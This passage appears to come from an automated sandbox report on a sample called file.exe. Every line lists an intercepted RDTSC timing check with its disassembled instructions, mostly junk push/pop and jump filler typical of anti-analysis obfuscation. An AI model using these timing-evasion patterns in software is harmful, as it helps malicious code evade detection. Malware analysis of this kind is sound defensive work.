Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DDD34 second address: 9DDD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBEC6 second address: 9DBEF5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7CC8D8AE3Dh 0x00000008 jmp 00007F7CC8D8AE37h 0x0000000d push esi 0x0000000e jbe 00007F7CC8D8AE26h 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBEF5 second address: 9DBEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBEF9 second address: 9DBEFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBEFF second address: 9DBF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C413h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC0A2 second address: 9DC0A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC374 second address: 9DC378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC378 second address: 9DC3A3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7CC8D8AE2Ch 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F7CC8D8AE32h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC3A3 second address: 9DC3AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC681 second address: 9DC68B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DD1C9 second address: 9DD1DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7CC902C410h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DF276 second address: 9DF27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8433 second address: 9E843F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7CC902C406h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E843F second address: 9E8452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7CC8D8AE2Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8452 second address: 9E8457 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E85CF second address: 9E85D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E85D5 second address: 9E85DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E85DB second address: 9E85E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jl 00007F7CC8D8AE26h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8732 second address: 9E873C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7CC902C406h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E89FB second address: 9E8A19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE34h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8A19 second address: 9E8A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E8BD6 second address: 9E8BF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7CC8D8AE34h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8BF1 second address: 9E8C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7CC902C406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jg 00007F7CC902C406h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8C09 second address: 9E8C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8C0D second address: 9E8C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8C13 second address: 9E8C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8EE5 second address: 9E8EFF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F7CC902C406h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 push eax 0x00000013 jno 00007F7CC902C406h 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8EFF second address: 9E8F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7CC8D8AE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8F09 second address: 9E8F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F2688 second address: 9F268C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F095E second address: 9F0962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0C1A second address: 9F0C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0C1E second address: 9F0C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0C2A second address: 9F0C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0C2E second address: 9F0C36 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F101A second address: 9F1025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1170 second address: 9F1175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F12E4 second address: 9F12EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1455 second address: 9F145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F145E second address: 9F1462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F15B6 second address: 9F15E3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7CC902C416h 0x00000008 push ecx 0x00000009 jbe 00007F7CC902C406h 0x0000000f jnp 00007F7CC902C406h 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F15E3 second address: 9F15FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC8D8AE2Eh 0x00000009 pop edi 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1D74 second address: 9F1D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1D7B second address: 9F1D8E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7CC8D8AE2Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jl 00007F7CC8D8AE26h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F24D7 second address: 9F24DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F24DD second address: 9F24E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7CC8D8AE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F24E7 second address: 9F24F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007F7CC902C406h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F24F9 second address: 9F2527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F7CC8D8AE32h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0369 second address: 9F0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7CC902C406h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6F59 second address: 9F6F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jp 00007F7CC8D8AE26h 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6F6E second address: 9F6F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C413h 0x00000007 ja 00007F7CC902C406h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6F8B second address: 9F6F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6F91 second address: 9F6F9E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7CC902C406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FAC5B second address: 9FAC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FAC61 second address: 9FAC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CD89 second address: A0CDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F7CC8D8AE2Eh 0x0000000a jmp 00007F7CC8D8AE32h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F7CC8D8AE38h 0x00000016 pushad 0x00000017 jmp 00007F7CC8D8AE34h 0x0000001c jmp 00007F7CC8D8AE2Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18829 second address: A18845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop edx 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c jmp 00007F7CC902C40Bh 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18845 second address: A18849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CA75 second address: A1CA7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25A4D second address: A25A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25A51 second address: A25A64 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7CC902C406h 0x00000008 jng 00007F7CC902C406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2435F second address: A24369 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24369 second address: A24375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7CC902C406h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24375 second address: A24398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE39h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2476B second address: A2477C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24B75 second address: A24B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25724 second address: A25755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC902C412h 0x00000009 jmp 00007F7CC902C415h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28811 second address: A28821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F7CC8D8AE26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28407 second address: A2842E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C419h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F7CC902C40Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B9B2 second address: A2B9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A313F4 second address: A31413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F7CC902C416h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31413 second address: A3142A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3142A second address: A31434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7CC902C406h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31434 second address: A31438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31438 second address: A31441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31441 second address: A31463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC8D8AE33h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34DC7 second address: A34DE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7CC902C40Dh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007F7CC902C406h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45F69 second address: A45F73 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57DD5 second address: A57DDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57DDB second address: A57DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56CCC second address: A56CD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56DFD second address: A56E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56F6C second address: A56F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F7CC902C406h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57533 second address: A5753C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5753C second address: A57541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57541 second address: A57549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57AAC second address: A57AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pop ebx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7CC902C40Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57AC3 second address: A57AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A593EA second address: A593EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E9D3 second address: 93E9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F7CC8D8AE33h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E9EE second address: 93E9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F7CC902C406h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BE2B second address: A5BE35 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BE35 second address: A5BE3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BE3A second address: A5BE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7CC8D8AE26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 jmp 00007F7CC8D8AE38h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C179 second address: A5C180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C180 second address: A5C18E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C18E second address: A5C1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7CC902C415h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C4CB second address: A5C4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D6F4 second address: A5D707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F7CC902C406h 0x0000000c jl 00007F7CC902C406h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D707 second address: A5D712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F7CC8D8AE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D712 second address: A5D718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
